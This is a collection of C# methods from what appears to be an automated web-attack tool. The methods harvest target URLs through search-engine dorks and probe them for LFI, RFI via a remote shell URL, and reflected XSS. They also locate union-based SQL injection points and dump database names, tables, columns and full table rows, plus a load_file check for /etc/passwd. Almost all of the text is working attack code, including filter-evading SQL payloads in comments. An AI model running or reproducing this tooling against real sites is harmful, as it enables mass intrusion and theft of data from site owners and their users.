// ? ===> %3F public void Yandex(string[] DorkArray, string maxpage) {//http://www.yandex.com/yandsearch?text=shop.php%3fsubcat_id%3d int compteur; int nbrdork = DorkArray.Length; int max = Convert.ToInt16(maxpage + 0); HttpRequete hr = new HttpRequete(); Extracteur ext = new Extracteur(); hr.get("https://www.yandex.com/yandsearch"); for (int i = 0; i < nbrdork; i++) //Pour Dork { for (compteur = 0; compteur < max; compteur++) //Pour Page a faire { string url = "http://www.yandex.com/yandsearch?text=" + HttpUtility.UrlEncode(DorkArray[i]) + "&p=" + compteur; string page = hr.get(url); if (!page.Contains("search requests sent from your IP")) { ext.Yandex(page); } else { break; } form.UpInfos(); } } }
public bool Lfi(string link) { HttpRequete hr = new HttpRequete(); bool bl = false; try { for (int i = 0; (i <= (link.Split(delimeteur).Length - 1)); i++) { string v = (link.Split(delimeteur)[i].Trim().Split('=')[0] + "=../"); if (v.Contains("=")) { string Source = hr.get(v); if (Source.Contains("No such file or directory")) { bl = true; } else { bl = false; } } } return(bl); } catch (Exception) { return(false); } }
public bool setInfos() { HttpRequete hr = new HttpRequete(); Outils oo = new Outils(); string url_g = _url_point.Replace(var_n, "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"); string page = hr.get(url_g); if (page.Contains(separateur)) { string[] rslt = ch.extSubResult(s_separateur, ch.extResult(separateur, page)); string ip = oo.avoirip(_url_point.Split('/')[2]); setBD(rslt[2]); form_principale.groupBox4.Invoke((MethodInvoker)(() => { form_principale.txt_user.Text = rslt[0]; form_principale.txt_version.Text = rslt[1]; form_principale.txt_ipserveur.Text = ip; })); return(true); } else { return(false); } }
public void Google(string[] DorkArray, string maxpage) { int compteur; int nbrdork = DorkArray.Length; int max = Convert.ToInt16(maxpage + 0); HttpRequete hr = new HttpRequete(); Extracteur ext = new Extracteur(); for (int i = 0; i < nbrdork; i++) { for (compteur = 0; compteur < max; compteur += 10) { string url = "https://www.google.com/search?q=" + HttpUtility.UrlEncode(DorkArray[i]) + "&start=" + compteur; string page = hr.get(url); if ((!page.Contains("CAPTCHA")) || (!page.Contains(form.monip))) { ext.Google(page); } else { } form.UpInfos(); } } }
private bool Rfi(string link, string SHELL_URL) { HttpRequete hr = new HttpRequete(); try { bool bl = false; for (int i = 0; (i <= (link.Split(delimeteur).Length - 1)); i++) { string v = (link.Split(delimeteur)[i].Trim().Split('=')[0] + ("=" + (SHELL_URL + "?"))); if (v.Contains("=")) { string Source = hr.get(v); if ((Source.Contains("RFI_SUCCESSFUL") && (!Source.Contains("$invulnerable") && (Source.Length > 20)))) { bl = true; } else { bl = false; } } } return(bl); } catch (Exception) { return(false); } }
private int getNombreDB() { HttpRequete hr = new HttpRequete(); string inj = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")"; string url_f = _url_point.Replace(var_n, inj); string page = hr.get(url_f); return(Convert.ToInt32(ch.extResult(separateur, page))); }
private int getNombreDonne(string db_name, string tb_name) { HttpRequete hr = new HttpRequete(); string inj = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from " + db_name + "." + tb_name + ")"; string url_f = _url_point.Replace(var_n, inj); string page = hr.get(url_f); return(Convert.ToInt32(ch.extResult(separateur, page))); }
private int getNombreColonne(string db_name, string tb_name) {///**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/sChEmAtA /**/wHeRe not /**/sChEmA_NaMe=0x696e666f726d6174696f6e5f736368656d61) HttpRequete hr = new HttpRequete(); string inj = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from information_schema.sChEmAtA where not sChEmA_NaMe=" + ch.getHex("information_schema") + ")"; string url_f = _url_point.Replace(var_n, inj); string page = hr.get(url_f); return(Convert.ToInt32(ch.extResult(separateur, page))); }
/* * //EXCEPTION * http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null * * */ public void Analyse(string url) { form.txt_statut_analyse.Invoke((MethodInvoker)(() => { form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine; })); checked { HttpRequete hr = new HttpRequete(); sqli_check vrf = new sqli_check(); sqli_colonne colonne = new sqli_colonne(); string url_inj_point = string.Empty; string inj_point_curr = string.Empty; bool point_trv = false; _url_originale = url; _url_base = url.Split('?')[0]; _param = ch.analyseParam(url); bool[] ok = new bool[2]; ok[0] = vrf.demmareAnalyseFast(url); ok[1] = vrf.demmareAnalyseAvanced(url); if (ok[0] || ok[1]) { int u = 0; //Union Style 1 while (!point_trv && u < _union.Count) { _nbr_colonne = colonne.Compter(_param, _url_base, _union[u]); onFait((u + 1).ToString()); for (int p = 0; p < _param.Count; p++) { _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne); url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count); inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")")); string page = hr.get(inj_point_curr); if (page.Contains(separateur) || page.Contains(s_separateur)) { setResult(page, url_inj_point); point_trv = true; break; } } u++; } } else { form.txt_statut_analyse.Invoke((MethodInvoker)(() => { form.txt_statut_analyse.Text = "Injection char echouer :( "; })); } } }
internal void setTable(string[] chemin_node) { foreach (string item in chemin_node) { string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries); int indexDB = -1; form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() => { try { indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index; form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Clear(); } catch (Exception) { } })); int nbr = 0; try { nbr = getNombreTable(mrc[0]); } catch { } //(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x6d6f64656c73686f5f6462) HttpRequete hr = new HttpRequete(); //Methode 1 //string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(table_name)," + ch.getHex(separateur) + ") from information_schema.tables where table_schema=" + ch.getHex(db_name) + ")"; //Methode 2 //unhex(Hex(cast(group_concat(table_name) as char))) string inj = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(table_name) as char)))," + ch.getHex(separateur) + ") from information_schema.tables where table_schema=" + ch.getHex(mrc[0]) + ")"; string url_f = _url_point.Replace(var_n, (inj)); string page = hr.get(url_f); string tablebrut = ch.extResult(separateur, page); string[] tables = tablebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries); foreach (string table in tables) { if (!string.IsNullOrEmpty(table)) { string table_name = ch.regexHtmlScape(table); try { form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() => { form_principale.tree_schema_dmp.BeginUpdate(); form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Add(table_name); form_principale.tree_schema_dmp.Nodes[indexDB].Expand(); form_principale.tree_schema_dmp.EndUpdate(); })); } catch { } } } } }
internal string[] getInfos(string url_point) { HttpRequete hr = new HttpRequete(); string url_g = url_point.Replace(var_n, "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"); string page = hr.get(url_g); if (page.Contains(separateur)) { string[] rslt = ch.extSubResult(s_separateur, ch.extResult(separateur, page)); return(rslt); } string[] vide = { "", "", "", "" }; return(vide); }
internal void setColonne(String[] chemin_node) { foreach (string item in chemin_node) { string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries); if (mrc.Length > 1) { int indexDB = -1; int indexTable = -1; form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() => { indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index; indexTable = form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[1])).Index; form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Clear(); })); int nbr = 0; try { nbr = getNombreColonne(mrc[0], mrc[1]); } catch { } HttpRequete hr = new HttpRequete(); //Methode 0 //string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(column_name)," + ch.getHex(separateur) + ") from information_schema.columns where table_schema=" + ch.getHex(db_name) + " and table_name=" + ch.getHex(table_name) + ")"; //Methode 1 //unhex(Hex(cast(group_concat(table_name) as char))) string inj = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(column_name) as char)))," + ch.getHex(separateur) + ") from information_schema.columns where table_schema=" + ch.getHex(mrc[0]) + " and table_name=" + ch.getHex(mrc[1]) + ")"; string url_f = _url_point.Replace(var_n, ch.Encode(inj)); string page = hr.get(url_f); string colonnebrut = ch.extResult(separateur, page); string[] colonnes = colonnebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries); foreach (string colonne in colonnes) { if (!string.IsNullOrEmpty(colonne)) { string colonne_name = ch.regexHtmlScape(colonne); form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() => { form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Add(colonne_name); form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Expand(); })); } } } } }
public void Bing(string[] DorkArray, string maxpage) { int compteur; int nbrdork = DorkArray.Length; int max = Convert.ToInt16(maxpage + 0); HttpRequete hr = new HttpRequete(); Extracteur ext = new Extracteur(); for (int i = 0; i < nbrdork; i++) //Pour Dork { for (compteur = 0; compteur < max; compteur += 15) //Pour Page a faire { string url = "http://bing.com/search?q=" + HttpUtility.UrlEncode(DorkArray[i]) + "&first=" + compteur; string page = hr.get(url); ext.Bing(page); form.UpInfos(); } } }
public void Yahoo(string[] DorkArray, string maxpage) { int compteur; int nbrdork = DorkArray.Length; int max = Convert.ToInt16(maxpage + 0); HttpRequete hr = new HttpRequete(); Extracteur ext = new Extracteur(); for (int i = 0; i < nbrdork; i++) //Pour Dork { for (compteur = 1; compteur < max; compteur += 10) //Pour Page a faire { string url = "http://search.yahoo.com/search?n=100&p=" + HttpUtility.UrlEncode(DorkArray[i]) + "&pstart=1&b=" + compteur; string page = hr.get(url); ext.Yahoo(page); form.UpInfos(); } } }
internal void setAllBD() { HttpRequete hr = new HttpRequete(); int nbr = 0; try { nbr = getNombreDB(); } catch { }//(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/sChEmA_NaMe),0x217e21) /**/fRoM information_schema./**/sChEmAtA /**/wHeRe not /**/sChEmA_NaMe=0x696e666f726d6174696f6e5f736368656d61) string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(schema_name)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")"; string url_f = _url_point.Replace(var_n, ch.Encode(inj)); string page = hr.get(url_f); string dbbrut = ch.extResult(separateur, page); if (dbbrut != string.Empty) { if (nbr > 1) { string[] basededonnes = dbbrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries); foreach (string bd in basededonnes) { if (!string.IsNullOrEmpty(bd)) { string bd_name = ch.regexHtmlScape(bd); TreeNode treeBD = new TreeNode(bd_name); form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() => { form_principale.tree_schema_dmp.BeginUpdate(); form_principale.tree_schema_dmp.Nodes.Add(treeBD); form_principale.tree_schema_dmp.EndUpdate(); })); } } } else { TreeNode treeBD = new TreeNode(dbbrut); form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() => { form_principale.tree_schema_dmp.Nodes.Add(treeBD); })); } } }
public bool demmareAnalyseFast(string url) { checked { string url_racine = url.Split('?')[0]; HttpRequete hr = new HttpRequete(); chaine ch = new chaine(); _param = ch.analyseParam(url); for (int i = 0; i < _param.Count; i++) { string url_c = url_racine + ch.genParamParIndex(_param, 0, i + 1) + sqli + ch.genParamParIndex(_param, i + 1, _param.Count); string page = hr.get(url_c); if (verifPage(page)) { return(true); } } return(false); } }
public bool Xss(string url) { HttpRequete hr = new HttpRequete(); bool bl = false; for (int i = 0; (i <= (url.Split(delimeteur).Length - 1)); i++) { string page = hr.get((url.Split(delimeteur)[i].Trim().Split('=')[i] + ('=' + ('"' + "><script>alert(\'XSS_SUCCESSFUL\')</script>")))); if ((page.Contains("<script>alert(\'XSS_SUCCESSFUL\')</script>") && !page.Contains("You have an error in your SQL syntax"))) { bl = true; } else { bl = false; } } return(bl); }
internal void Aol(string[] DorkArray, string maxpage) { int compteur; int nbrdork = DorkArray.Length; int max = Convert.ToInt16(maxpage + 0); HttpRequete hr = new HttpRequete(); Extracteur ext = new Extracteur(); hr.get("http://search.aol.com/aol/webhome"); for (int i = 0; i < nbrdork; i++) //Pour Dork { for (compteur = 0; compteur < max; compteur++) //Pour Page a faire //http://search.aol.com/aol/search?q= { string url = "http://search.aol.com/aol/search?q=" + DorkArray[i] + "&page=" + compteur; string page = hr.get(url); ext.Aol(page); form.UpInfos(); } } }
internal bool checkLoadFile(string url_point, string fichier = "/etc/passwd") { HttpRequete hr = new HttpRequete(); Outils oo = new Outils(); string url_g = url_point.Replace(var_n, "cOnVeRt(/**/cOnCaT(" + ch.getHex(separateur) + "/**/hEx(/**/lOaD_FiLe(" + ch.getHex(fichier) + "))," + ch.getHex(separateur) + ") using utf8)"); string page = hr.get(url_g); if (page.Contains(separateur)) { string result = ch.extResult(separateur, page); if (result != "") { return(true); } else { return(false); } } return(false); }
internal void setDonne(String[] chemin_node) { foreach (string item in chemin_node) { string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries); if (mrc.Length > 2) { int nbr_row = 0; nbr_row = getNombreDonne(mrc[0], mrc[1]); HttpRequete hr = new HttpRequete(); string[] colonne = mrc[2].Split(new string[] { "[-COL]" }, StringSplitOptions.RemoveEmptyEntries); form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() => { foreach (string element in colonne) { if (element != string.Empty) { form_principale.dataGridView_dumper.Columns.Add(element, element); } } })); for (int d = 0; d < nbr_row; d++) { string inj = "(select concat(" + BuildQuery(s_separateur, colonne) + ") from " + mrc[0] + "." + mrc[1] + " limit " + d + ",1)"; string url_f = _url_point.Replace(var_n, inj); string page = hr.get(url_f); string donnebrut = ch.extResult(separateur, page); string[] resultLignes = donnebrut.Split(new string[] { s_separateur }, StringSplitOptions.None); if (checkAllEmpty(resultLignes)) { form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() => { form_principale.dataGridView_dumper.Rows.Add(resultLignes); })); } } } } }
public bool demmareAnalyseAvanced(string url) { checked { string url_racine = url.Split('?')[0]; HttpRequete hr = new HttpRequete(); chaine ch = new chaine(); _param = ch.analyseParam(url); string param_curr = baseI.Replace(var_n, baseF.Replace(var_n, ch.getHex(separateur) + "," + ch.getHex(testSTR) + "," + ch.getHex(separateur))); for (int i = 0; i < _param.Count; i++) { string url_c = url_racine + ch.ViderDernierParam(ch.genParamParIndex(_param, 0, i + 1)) + ch.Encode(param_curr) + ch.genParamParIndex(_param, i + 1, _param.Count); string page = hr.get(url_c); if (verifPageAdvenced(page)) { return(true); } } return(false); } }
public int FindColonneVise(string url, int maxColonne) { HttpRequete hr = new HttpRequete(); const string okstr = "QUADCOREENGINE666"; //51554144434f5245454e47494e45363636 string chkstr = "concat(0x217e21," + var_n + ",0x217e21)"; //concat(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) string url_f = string.Empty; string _url_base = url.Split('?')[0]; string _url_params = "?" + url.Split('?')[1]; for (int i = 1; i <= maxColonne + 1; i++) { string param = ch.Encode(chkstr.Replace(var_n, ch.getHex(okstr))); var regex = new Regex(Regex.Escape(i.ToString())); url_f = _url_base + regex.Replace(_url_params, param, 1); string page = hr.get(url_f); if (page.Contains(okstr)) { return(i); } } //MessageBox.Show(url_f); return(-1); }
public int Compter(List <string> param, string url_base, string union) { checked { HttpRequete hr = new HttpRequete(); for (int p = 0; p < param.Count; p++) { for (int i = 0; i <= 60; i++) { string url_curr = url_base + ch.ViderDernierParam(ch.genParamParIndex(param, 0, (p + 1))) + ch.Encode(union.Replace(var_n, GenSynHex(i))) + ch.genParamParIndex(param, p + 1, param.Count); string page = hr.get(url_curr); if (page.Contains(syntax_count)) { return(i); } } } return(0); } }
public bool WebDav_Scanner(string url) { HttpRequete hr = new HttpRequete(); try { string urltrv = ("http://" + (url + "/webdav/")); string str = hr.get(urltrv); if (str.Contains("WebDAV testpage")) { return(true); } else { return(false); } } catch (Exception) { return(false); } }
public string Analyse(string url) { checked { HttpRequete hr = new HttpRequete(); sqli_check vrf = new sqli_check(); sqli_colonne colonne = new sqli_colonne(); string url_inj_point = string.Empty; string inj_point_curr = string.Empty; bool point_trv = false; _url_originale = url; _url_base = url.Split('?')[0]; _param = ch.analyseParam(url); int u = 0; //Union Style 1 while (!point_trv && u < _unionStyle.Count) { _nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]); for (int p = 0; p < _param.Count; p++) { _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne); url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count); inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")")); string page = hr.get(inj_point_curr); if (page.Contains(separateur) || page.Contains(s_separateur)) { return(url_inj_point); } } u++; } return("False"); } }